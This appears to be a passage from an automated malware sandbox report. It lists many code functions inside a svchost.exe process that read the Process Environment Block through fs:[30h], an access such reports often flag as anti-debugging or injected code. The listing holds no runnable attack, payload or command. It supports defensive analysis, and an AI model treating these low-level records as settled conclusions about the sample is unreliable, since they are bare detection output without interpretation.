Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]	2_2_03AC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]	2_2_03A2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]	2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]	2_2_03A36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]	2_2_03A280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]	2_2_03AC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_03AF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]	2_2_03A3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_03A2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]	2_2_03A380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]	2_2_03AB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_03A2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]	2_2_03A720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]	2_2_03AB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]	2_2_03A2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]	2_2_03A2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]	2_2_03AC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]	2_2_03AB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]	2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]	2_2_03A4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]	2_2_03A5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]	2_2_03A32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]	2_2_03AB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]	2_2_03A307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]	2_2_03AE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]	2_2_03AD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]	2_2_03A527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]	2_2_03ABE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]	2_2_03A347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]	2_2_03AB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]	2_2_03A6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]	2_2_03A6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]	2_2_03AAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]	2_2_03A6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]	2_2_03A30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]	2_2_03A60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]	2_2_03A38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]	2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]	2_2_03A6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]	2_2_03A30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]	2_2_03ABE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]	2_2_03A72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]	2_2_03AB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03A6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]	2_2_03A666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]	2_2_03A34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03AAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03AB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03A6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]	2_2_03A4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]	2_2_03A66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]	2_2_03A68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]	2_2_03A3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]	2_2_03AAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]	2_2_03A4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]	2_2_03A72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]	2_2_03AF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]	2_2_03A6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]	2_2_03A62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]	2_2_03A4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03AB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]	2_2_03A545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]	2_2_03A32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]	2_2_03A64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]	2_2_03A6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]	2_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]	2_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]	2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]	2_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]	2_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]	2_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]	2_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]	2_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]	2_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]	2_2_03AEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]	2_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]	2_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]	2_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]	2_2_03A6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]	2_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	2_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]	2_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]	2_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]	2_2_03AEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]	2_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]	2_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]	2_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03AE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]	2_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]	2_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]	2_2_03B04B00
